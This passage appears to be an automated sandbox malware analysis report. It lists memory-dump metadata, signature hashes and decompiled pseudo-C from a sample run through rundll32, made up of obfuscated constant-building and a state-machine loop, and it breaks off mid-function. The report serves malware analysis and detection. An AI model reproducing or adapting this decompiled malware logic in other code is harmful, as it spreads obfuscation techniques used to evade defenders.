                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Agz$DWK$E+A$g$pw
                                                                                                                      • API String ID: 0-1474679353
                                                                                                                      • Opcode ID: 721e80792fbc42e17180adc1f357c3f6fccc0e7495edaa3617d162a1b748a681
                                                                                                                      • Instruction ID: 0449a55c76ad5af72009fae5e57894860d09eb7d415477bcea2a9e3541495e57
                                                                                                                      • Opcode Fuzzy Hash: 721e80792fbc42e17180adc1f357c3f6fccc0e7495edaa3617d162a1b748a681
                                                                                                                      • Instruction Fuzzy Hash: AF32127250C3808FE368CF25C94AA8BFBF2BBC5748F10891DE19986261D7B59949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E0068F09B(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				signed int _v2612;
                                                                                                                      				signed int _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t443;
                                                                                                                      				signed int _t444;
                                                                                                                      				signed int _t445;
                                                                                                                      				signed int _t446;
                                                                                                                      				signed int _t447;
                                                                                                                      				signed int _t448;
                                                                                                                      				signed int _t449;
                                                                                                                      				signed int _t450;
                                                                                                                      				signed int _t451;
                                                                                                                      				signed int _t452;
                                                                                                                      				signed int _t453;
                                                                                                                      				signed int _t458;
                                                                                                                      				void* _t502;
                                                                                                                      				void* _t503;
                                                                                                                      				signed int* _t507;
                                                                                                                      
                                                                                                                      				_t507 =  &_v2772;
                                                                                                                      				_v2628 = 0x98f0ce;
                                                                                                                      				_v2628 = _v2628 >> 0xb;
                                                                                                                      				_v2628 = _v2628 ^ 0x00001337;
                                                                                                                      				_v2696 = 0x96ddc1;
                                                                                                                      				_v2696 = _v2696 + 0xffff0eed;
                                                                                                                      				_v2696 = _v2696 + 0xffffc9f2;
                                                                                                                      				_v2696 = _v2696 ^ 0x009155bb;
                                                                                                                      				_v2748 = 0x5205ca;
                                                                                                                      				_v2748 = _v2748 ^ 0x19402ba5;
                                                                                                                      				_t502 = __ecx;
                                                                                                                      				_t503 = 0xea1969c;
                                                                                                                      				_t443 = 0x43;
                                                                                                                      				_v2748 = _v2748 / _t443;
                                                                                                                      				_t444 = 0xb;
                                                                                                                      				_v2748 = _v2748 / _t444;
                                                                                                                      				_v2748 = _v2748 ^ 0x000a2456;
                                                                                                                      				_v2604 = 0x2f1706;
                                                                                                                      				_t445 = 0x26;
                                                                                                                      				_v2604 = _v2604 * 6;
                                                                                                                      				_v2604 = _v2604 ^ 0x011fcdd9;
                                                                                                                      				_v2684 = 0x108800;
                                                                                                                      				_v2684 = _v2684 >> 0xc;
                                                                                                                      				_v2684 = _v2684 / _t445;
                                                                                                                      				_v2684 = _v2684 ^ 0x00056909;
                                                                                                                      				_v2764 = 0x56ac6f;
                                                                                                                      				_v2764 = _v2764 << 0xe;
                                                                                                                      				_v2764 = _v2764 | 0x24a96f4c;
                                                                                                                      				_t446 = 0x42;
                                                                                                                      				_v2764 = _v2764 / _t446;
                                                                                                                      				_v2764 = _v2764 ^ 0x02abe6d6;
                                                                                                                      				_v2680 = 0xb60c61;
                                                                                                                      				_t447 = 0x16;
                                                                                                                      				_v2680 = _v2680 / _t447;
                                                                                                                      				_v2680 = _v2680 << 7;
                                                                                                                      				_v2680 = _v2680 ^ 0x04229d93;
                                                                                                                      				_v2712 = 0x6d1dcd;
                                                                                                                      				_v2712 = _v2712 | 0x18b294c6;
                                                                                                                      				_v2712 = _v2712 ^ 0xf88c4d23;
                                                                                                                      				_v2712 = _v2712 ^ 0xe07332c4;
                                                                                                                      				_v2612 = 0x9fb2e7;
                                                                                                                      				_v2612 = _v2612 | 0xd190ff6b;
                                                                                                                      				_v2612 = _v2612 ^ 0xd1908c6f;
                                                                                                                      				_v2732 = 0x85d89e;
                                                                                                                      				_v2732 = _v2732 << 5;
                                                                                                                      				_v2732 = _v2732 >> 0xd;
                                                                                                                      				_t448 = 0x37;
                                                                                                                      				_v2732 = _v2732 / _t448;
                                                                                                                      				_v2732 = _v2732 ^ 0x0009f3db;
                                                                                                                      				_v2704 = 0x8a2dac;
                                                                                                                      				_v2704 = _v2704 << 0xd;
                                                                                                                      				_v2704 = _v2704 * 6;
                                                                                                                      				_v2704 = _v2704 ^ 0xa2425f92;
                                                                                                                      				_v2620 = 0x8530c4;
                                                                                                                      				_v2620 = _v2620 | 0x7f36b61d;
                                                                                                                      				_v2620 = _v2620 ^ 0x7fb2adaf;
                                                                                                                      				_v2756 = 0xf61f4c;
                                                                                                                      				_v2756 = _v2756 >> 0xe;
                                                                                                                      				_t449 = 0x4b;
                                                                                                                      				_v2756 = _v2756 / _t449;
                                                                                                                      				_v2756 = _v2756 + 0xffffd188;
                                                                                                                      				_v2756 = _v2756 ^ 0xfff88f11;
                                                                                                                      				_v2660 = 0x7ee31b;
                                                                                                                      				_v2660 = _v2660 | 0xd8d04f1e;
                                                                                                                      				_v2660 = _v2660 ^ 0xd8ffeb88;
                                                                                                                      				_v2672 = 0xc71ff5;
                                                                                                                      				_v2672 = _v2672 >> 0xf;
                                                                                                                      				_v2672 = _v2672 ^ 0x000b63b3;
                                                                                                                      				_v2740 = 0x49f4c1;
                                                                                                                      				_t450 = 0x76;
                                                                                                                      				_v2740 = _v2740 * 0x4b;
                                                                                                                      				_v2740 = _v2740 + 0xffff254a;
                                                                                                                      				_v2740 = _v2740 * 0x48;
                                                                                                                      				_v2740 = _v2740 ^ 0x17c5e1bd;
                                                                                                                      				_v2652 = 0x2197ca;
                                                                                                                      				_v2652 = _v2652 * 0x5a;
                                                                                                                      				_v2652 = _v2652 ^ 0x0bc440cb;
                                                                                                                      				_v2720 = 0x771a3f;
                                                                                                                      				_v2720 = _v2720 >> 0xe;
                                                                                                                      				_v2720 = _v2720 + 0x9ab6;
                                                                                                                      				_v2720 = _v2720 ^ 0x0000c33a;
                                                                                                                      				_v2688 = 0x2271c;
                                                                                                                      				_v2688 = _v2688 / _t450;
                                                                                                                      				_v2688 = _v2688 << 9;
                                                                                                                      				_v2688 = _v2688 ^ 0x0000f5c5;
                                                                                                                      				_v2608 = 0xceafd9;
                                                                                                                      				_t451 = 0x5b;
                                                                                                                      				_v2608 = _v2608 / _t451;
                                                                                                                      				_v2608 = _v2608 ^ 0x00020c5c;
                                                                                                                      				_v2644 = 0x474c12;
                                                                                                                      				_v2644 = _v2644 + 0xffff00ab;
                                                                                                                      				_v2644 = _v2644 ^ 0x00446b0a;
                                                                                                                      				_v2760 = 0xca1d14;
                                                                                                                      				_t452 = 0x36;
                                                                                                                      				_v2760 = _v2760 / _t452;
                                                                                                                      				_v2760 = _v2760 ^ 0x098f5074;
                                                                                                                      				_v2760 = _v2760 ^ 0x8a27b7fe;
                                                                                                                      				_v2760 = _v2760 ^ 0x83afe7c4;
                                                                                                                      				_v2636 = 0x5d1272;
                                                                                                                      				_v2636 = _v2636 + 0xf4cf;
                                                                                                                      				_v2636 = _v2636 ^ 0x005057cd;
                                                                                                                      				_v2768 = 0x30e751;
                                                                                                                      				_v2768 = _v2768 | 0xcda5a365;
                                                                                                                      				_t453 = 5;
                                                                                                                      				_v2768 = _v2768 * 0x7d;
                                                                                                                      				_v2768 = _v2768 + 0xffff52f5;
                                                                                                                      				_v2768 = _v2768 ^ 0x71df24ad;
                                                                                                                      				_v2772 = 0x3d9f4c;
                                                                                                                      				_v2772 = _v2772 / _t453;
                                                                                                                      				_v2772 = _v2772 | 0x64d73223;
                                                                                                                      				_v2772 = _v2772 >> 2;
                                                                                                                      				_v2772 = _v2772 ^ 0x1935e4e1;
                                                                                                                      				_v2744 = 0xaeb35;
                                                                                                                      				_v2744 = _v2744 << 0x10;
                                                                                                                      				_v2744 = _v2744 + 0xffff2953;
                                                                                                                      				_v2744 = _v2744 + 0xffff82ad;
                                                                                                                      				_v2744 = _v2744 ^ 0xeb3966f5;
                                                                                                                      				_v2752 = 0x66dc67;
                                                                                                                      				_v2752 = _v2752 + 0x90a4;
                                                                                                                      				_v2752 = _v2752 + 0x6fc1;
                                                                                                                      				_v2752 = _v2752 ^ 0x6a9d4e17;
                                                                                                                      				_v2752 = _v2752 ^ 0x6af88c69;
                                                                                                                      				_v2716 = 0xce0c89;
                                                                                                                      				_v2716 = _v2716 ^ 0x42dcf22f;
                                                                                                                      				_v2716 = _v2716 | 0xbb0a480d;
                                                                                                                      				_v2716 = _v2716 ^ 0xfb186e5d;
                                                                                                                      				_v2616 = 0x5746b3;
                                                                                                                      				_v2616 = _v2616 | 0xa6a5976e;
                                                                                                                      				_v2616 = _v2616 ^ 0xa6f469a2;
                                                                                                                      				_v2708 = 0xa6d434;
                                                                                                                      				_v2708 = _v2708 << 0xa;
                                                                                                                      				_v2708 = _v2708 | 0x1b169a68;
                                                                                                                      				_v2708 = _v2708 ^ 0x9b5e88e0;
                                                                                                                      				_v2736 = 0x9f8594;
                                                                                                                      				_v2736 = _v2736 + 0xffffc5c7;
                                                                                                                      				_t454 = 9;
                                                                                                                      				_v2736 = _v2736 / _t454;
                                                                                                                      				_v2736 = _v2736 + 0xffff650c;
                                                                                                                      				_v2736 = _v2736 ^ 0x001c27e2;
                                                                                                                      				_v2668 = 0xeff616;
                                                                                                                      				_v2668 = _v2668 << 4;
                                                                                                                      				_v2668 = _v2668 ^ 0x0efcbcf0;
                                                                                                                      				_v2640 = 0x84564;
                                                                                                                      				_v2640 = _v2640 >> 9;
                                                                                                                      				_v2640 = _v2640 ^ 0x00099447;
                                                                                                                      				_v2648 = 0xb94e9c;
                                                                                                                      				_v2648 = _v2648 >> 7;
                                                                                                                      				_v2648 = _v2648 ^ 0x000c8381;
                                                                                                                      				_v2656 = 0x4f0029;
                                                                                                                      				_v2656 = _v2656 * 0x26;
                                                                                                                      				_v2656 = _v2656 ^ 0x0bb68559;
                                                                                                                      				_v2700 = 0xc64297;
                                                                                                                      				_v2700 = _v2700 << 0x10;
                                                                                                                      				_v2700 = _v2700 ^ 0xb6f38c4d;
                                                                                                                      				_v2700 = _v2700 ^ 0xf46a369f;
                                                                                                                      				_v2664 = 0x51e71d;
                                                                                                                      				_v2664 = _v2664 * 0xf;
                                                                                                                      				_v2664 = _v2664 ^ 0x04c73adc;
                                                                                                                      				_v2728 = 0xfedaba;
                                                                                                                      				_v2728 = _v2728 + 0xfffff930;
                                                                                                                      				_v2728 = _v2728 + 0xfffff3b0;
                                                                                                                      				_v2728 = _v2728 + 0xffff7b6e;
                                                                                                                      				_v2728 = _v2728 ^ 0x00f92d7b;
                                                                                                                      				_v2632 = 0xc4e34f;
                                                                                                                      				_t425 = _v2632 * 0x17;
                                                                                                                      				_v2632 = _t425;
                                                                                                                      				_v2632 = _v2632 ^ 0x11b64b79;
                                                                                                                      				_v2676 = 0x4fbb37;
                                                                                                                      				_v2676 = _v2676 + 0x433;
                                                                                                                      				_v2676 = _v2676 >> 1;
                                                                                                                      				_v2676 = _v2676 ^ 0x002442b0;
                                                                                                                      				_v2724 = 0xe01143;
                                                                                                                      				_v2724 = _v2724 | 0x0dc37ba2;
                                                                                                                      				_v2724 = _v2724 + 0xe020;
                                                                                                                      				_v2724 = _v2724 ^ 0x0dec213c;
                                                                                                                      				_v2624 = 0xd4ff52;
                                                                                                                      				_v2624 = _v2624 << 0xe;
                                                                                                                      				_v2624 = _v2624 ^ 0x3fd02267;
                                                                                                                      				_v2692 = 0xfd19e6;
                                                                                                                      				_v2692 = _v2692 + 0x8b9c;
                                                                                                                      				_v2692 = _v2692 | 0x5cbd23eb;
                                                                                                                      				_v2692 = _v2692 ^ 0x5cf129d9;
                                                                                                                      				while(_t503 != 0x5de06da) {
                                                                                                                      					if(_t503 == 0xea1969c) {
                                                                                                                      						_t503 = 0xfa9128f;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t515 = _t503 - 0xfa9128f;
                                                                                                                      						if(_t503 != 0xfa9128f) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t503 - 0xa8e801c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E0069DA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
                                                                                                                      							 *((short*)(E0068B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
                                                                                                                      							E00688969(_v2612,  &_v1560, _t515, _v2732, _v2704);
                                                                                                                      							_push(_v2660);
                                                                                                                      							_push(_v2756);
                                                                                                                      							E006847CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E0069DCF7(_v2620, 0x681308, _t515),  &_v1560, _v2720, _v2688);
                                                                                                                      							E0068A8B0(_v2608, _t437, _v2644);
                                                                                                                      							_t454 = _v2760;
                                                                                                                      							_t425 = E0068EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
                                                                                                                      							_t507 =  &(_t507[0x17]);
                                                                                                                      							if(_t425 != 0) {
                                                                                                                      								_t503 = 0x5de06da;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t425;
                                                                                                                      				}
                                                                                                                      				_push(_v2616);
                                                                                                                      				_push(_v2628);
                                                                                                                      				_push(_v2716);
                                                                                                                      				_push( &_v1040);
                                                                                                                      				E006946BB(_v2744, _v2752);
                                                                                                                      				_push(_v2668);
                                                                                                                      				_push(_v2736);
                                                                                                                      				E006847CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E0069DCF7(_v2708, 0x681348, __eflags),  &_v2080, _v2700, _v2664);
                                                                                                                      				_t458 = _v2728;
                                                                                                                      				E0068A8B0(_t458, _t428, _v2632);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_t458);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2624);
                                                                                                                      				_t454 = _v2676;
                                                                                                                      				_push( &_v520);
                                                                                                                      				_t425 = E0068AB87(_v2676, _v2724, __eflags);
                                                                                                                      				_t507 = _t507 - 0xc + 0x64;
                                                                                                                      				_t503 = 0xa8e801c;
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x0068f263
                                                                                                                      0x0068f26b
                                                                                                                      0x0068f276
                                                                                                                      0x0068f27b
                                                                                                                      0x0068f281
                                                                                                                      0x0068f289
                                                                                                                      0x0068f291
                                                                                                                      0x0068f29c
                                                                                                                      0x0068f2a7
                                                                                                                      0x0068f2b2
                                                                                                                      0x0068f2ba
                                                                                                                      0x0068f2bf
                                                                                                                      0x0068f2c7
                                                                                                                      0x0068f2d4
                                                                                                                      0x0068f2d7
                                                                                                                      0x0068f2db
                                                                                                                      0x0068f2e8
                                                                                                                      0x0068f2ec
                                                                                                                      0x0068f2f4
                                                                                                                      0x0068f307
                                                                                                                      0x0068f30e
                                                                                                                      0x0068f319
                                                                                                                      0x0068f321
                                                                                                                      0x0068f326
                                                                                                                      0x0068f32e
                                                                                                                      0x0068f336
                                                                                                                      0x0068f346
                                                                                                                      0x0068f34a
                                                                                                                      0x0068f34f
                                                                                                                      0x0068f357
                                                                                                                      0x0068f369
                                                                                                                      0x0068f36e
                                                                                                                      0x0068f377
                                                                                                                      0x0068f382
                                                                                                                      0x0068f38d
                                                                                                                      0x0068f398
                                                                                                                      0x0068f3a3
                                                                                                                      0x0068f3af
                                                                                                                      0x0068f3b4
                                                                                                                      0x0068f3ba
                                                                                                                      0x0068f3c2
                                                                                                                      0x0068f3ca
                                                                                                                      0x0068f3d2
                                                                                                                      0x0068f3dd
                                                                                                                      0x0068f3e8
                                                                                                                      0x0068f3f3
                                                                                                                      0x0068f3fb
                                                                                                                      0x0068f408
                                                                                                                      0x0068f409
                                                                                                                      0x0068f40d
                                                                                                                      0x0068f415
                                                                                                                      0x0068f41d
                                                                                                                      0x0068f42b
                                                                                                                      0x0068f42f
                                                                                                                      0x0068f437
                                                                                                                      0x0068f43e
                                                                                                                      0x0068f44b
                                                                                                                      0x0068f453
                                                                                                                      0x0068f458
                                                                                                                      0x0068f460
                                                                                                                      0x0068f468
                                                                                                                      0x0068f470
                                                                                                                      0x0068f478
                                                                                                                      0x0068f480
                                                                                                                      0x0068f488
                                                                                                                      0x0068f490
                                                                                                                      0x0068f498
                                                                                                                      0x0068f4a0
                                                                                                                      0x0068f4a8
                                                                                                                      0x0068f4b0
                                                                                                                      0x0068f4b8
                                                                                                                      0x0068f4c3
                                                                                                                      0x0068f4ce
                                                                                                                      0x0068f4d9
                                                                                                                      0x0068f4e1
                                                                                                                      0x0068f4e6
                                                                                                                      0x0068f4ee
                                                                                                                      0x0068f4f6
                                                                                                                      0x0068f4fe
                                                                                                                      0x0068f50c
                                                                                                                      0x0068f50f
                                                                                                                      0x0068f513
                                                                                                                      0x0068f51b
                                                                                                                      0x0068f523
                                                                                                                      0x0068f52b
                                                                                                                      0x0068f530
                                                                                                                      0x0068f538
                                                                                                                      0x0068f543
                                                                                                                      0x0068f54b
                                                                                                                      0x0068f556
                                                                                                                      0x0068f561
                                                                                                                      0x0068f569
                                                                                                                      0x0068f574
                                                                                                                      0x0068f587
                                                                                                                      0x0068f58e
                                                                                                                      0x0068f599
                                                                                                                      0x0068f5a1
                                                                                                                      0x0068f5a6
                                                                                                                      0x0068f5ae
                                                                                                                      0x0068f5b6
                                                                                                                      0x0068f5c3
                                                                                                                      0x0068f5c7
                                                                                                                      0x0068f5cf
                                                                                                                      0x0068f5d7
                                                                                                                      0x0068f5df
                                                                                                                      0x0068f5e7
                                                                                                                      0x0068f5ef
                                                                                                                      0x0068f5f7
                                                                                                                      0x0068f602
                                                                                                                      0x0068f60a
                                                                                                                      0x0068f611
                                                                                                                      0x0068f61c
                                                                                                                      0x0068f624
                                                                                                                      0x0068f62c
                                                                                                                      0x0068f630
                                                                                                                      0x0068f638
                                                                                                                      0x0068f640
                                                                                                                      0x0068f648
                                                                                                                      0x0068f650
                                                                                                                      0x0068f658
                                                                                                                      0x0068f663
                                                                                                                      0x0068f66b
                                                                                                                      0x0068f676
                                                                                                                      0x0068f67e
                                                                                                                      0x0068f686
                                                                                                                      0x0068f68e
                                                                                                                      0x0068f696
                                                                                                                      0x0068f6a4
                                                                                                                      0x0068f7b0
                                                                                                                      0x00000000
                                                                                                                      0x0068f6aa
                                                                                                                      0x0068f6aa
                                                                                                                      0x0068f6b0
                                                                                                                      0x0068f883
                                                                                                                      0x0068f883
                                                                                                                      0x0068f889
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068f6b6
                                                                                                                      0x0068f6d2
                                                                                                                      0x0068f700
                                                                                                                      0x0068f70a
                                                                                                                      0x0068f70f
                                                                                                                      0x0068f71b
                                                                                                                      0x0068f762
                                                                                                                      0x0068f777
                                                                                                                      0x0068f795
                                                                                                                      0x0068f799
                                                                                                                      0x0068f79e
                                                                                                                      0x0068f7a3
                                                                                                                      0x0068f7a9
                                                                                                                      0x00000000
                                                                                                                      0x0068f7a9
                                                                                                                      0x0068f7a3
                                                                                                                      0x0068f6b0
                                                                                                                      0x0068f898
                                                                                                                      0x0068f898
                                                                                                                      0x0068f7ba
                                                                                                                      0x0068f7c8
                                                                                                                      0x0068f7cf
                                                                                                                      0x0068f7de
                                                                                                                      0x0068f7df
                                                                                                                      0x0068f7e4
                                                                                                                      0x0068f7f0
                                                                                                                      0x0068f837
                                                                                                                      0x0068f843
                                                                                                                      0x0068f849
                                                                                                                      0x0068f858
                                                                                                                      0x0068f85c
                                                                                                                      0x0068f85e
                                                                                                                      0x0068f85f
                                                                                                                      0x0068f861
                                                                                                                      0x0068f863
                                                                                                                      0x0068f86e
                                                                                                                      0x0068f875
                                                                                                                      0x0068f876
                                                                                                                      0x0068f87b
                                                                                                                      0x0068f87e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kD$)$5$<!$Q0
                                                                                                                      • API String ID: 0-101729813
                                                                                                                      • Opcode ID: acc77a30cdff70fd65aa5a121d2deedf80819d5a6c781e0eab0c9f1c76d381f9
                                                                                                                      • Instruction ID: c235ff9f2efcde44c7dbb85323d35eb67b68cac009c5a8275bf3a72706864cdb
                                                                                                                      • Opcode Fuzzy Hash: acc77a30cdff70fd65aa5a121d2deedf80819d5a6c781e0eab0c9f1c76d381f9
                                                                                                                      • Instruction Fuzzy Hash: D11212715083809FD3A8DF21C48AA8BBBE2FBC5714F508A1DE5D986260DBB58949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006A0F33() {
                                                                                                                      				signed int _t237;
                                                                                                                      				signed char _t246;
                                                                                                                      				signed short _t255;
                                                                                                                      				signed int _t262;
                                                                                                                      				signed char _t269;
                                                                                                                      				intOrPtr* _t292;
                                                                                                                      				signed short _t301;
                                                                                                                      				void* _t302;
                                                                                                                      				signed short _t306;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int _t313;
                                                                                                                      				signed int _t314;
                                                                                                                      				signed int _t315;
                                                                                                                      				signed short _t319;
                                                                                                                      				void* _t321;
                                                                                                                      
                                                                                                                      				 *(_t321 + 0x20) = 0xee0abc;
                                                                                                                      				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
                                                                                                                      				_t262 = 0x40ff1a8;
                                                                                                                      				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
                                                                                                                      				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
                                                                                                                      				 *(_t321 + 0x14) = 0x97563a;
                                                                                                                      				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
                                                                                                                      				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
                                                                                                                      				_t309 = 0x68;
                                                                                                                      				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
                                                                                                                      				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
                                                                                                                      				 *(_t321 + 0x54) = 0x46dfd;
                                                                                                                      				_t310 = 0x22;
                                                                                                                      				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
                                                                                                                      				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
                                                                                                                      				 *(_t321 + 0x50) = 0x65d669;
                                                                                                                      				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
                                                                                                                      				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
                                                                                                                      				 *(_t321 + 0x1c) = 0xa5dab8;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
                                                                                                                      				 *(_t321 + 0x58) = 0x508bac;
                                                                                                                      				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
                                                                                                                      				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
                                                                                                                      				 *(_t321 + 0x38) = 0x6dc462;
                                                                                                                      				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
                                                                                                                      				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
                                                                                                                      				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
                                                                                                                      				 *(_t321 + 0x20) = 0x10f337;
                                                                                                                      				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
                                                                                                                      				_t311 = 0x7a;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
                                                                                                                      				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
                                                                                                                      				 *(_t321 + 0x28) = 0x5a8e56;
                                                                                                                      				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
                                                                                                                      				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
                                                                                                                      				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
                                                                                                                      				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
                                                                                                                      				 *(_t321 + 0x40) = 0x558325;
                                                                                                                      				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
                                                                                                                      				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
                                                                                                                      				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
                                                                                                                      				 *(_t321 + 0x3c) = 0x76576d;
                                                                                                                      				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
                                                                                                                      				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
                                                                                                                      				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
                                                                                                                      				 *(_t321 + 0x38) = 0x7fcfc;
                                                                                                                      				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
                                                                                                                      				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
                                                                                                                      				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
                                                                                                                      				 *(_t321 + 0x58) = 0x685aea;
                                                                                                                      				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
                                                                                                                      				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
                                                                                                                      				 *(_t321 + 0x24) = 0x2cb25b;
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
                                                                                                                      				 *(_t321 + 0x20) = 0x5c4f5f;
                                                                                                                      				_t312 = 0x75;
                                                                                                                      				_t306 =  *(_t321 + 0x70);
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
                                                                                                                      				_t319 =  *(_t321 + 0x70);
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
                                                                                                                      				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
                                                                                                                      				 *(_t321 + 0x48) = 0x281dd4;
                                                                                                                      				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
                                                                                                                      				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
                                                                                                                      				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
                                                                                                                      				 *(_t321 + 0x60) = 0x5ec984;
                                                                                                                      				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
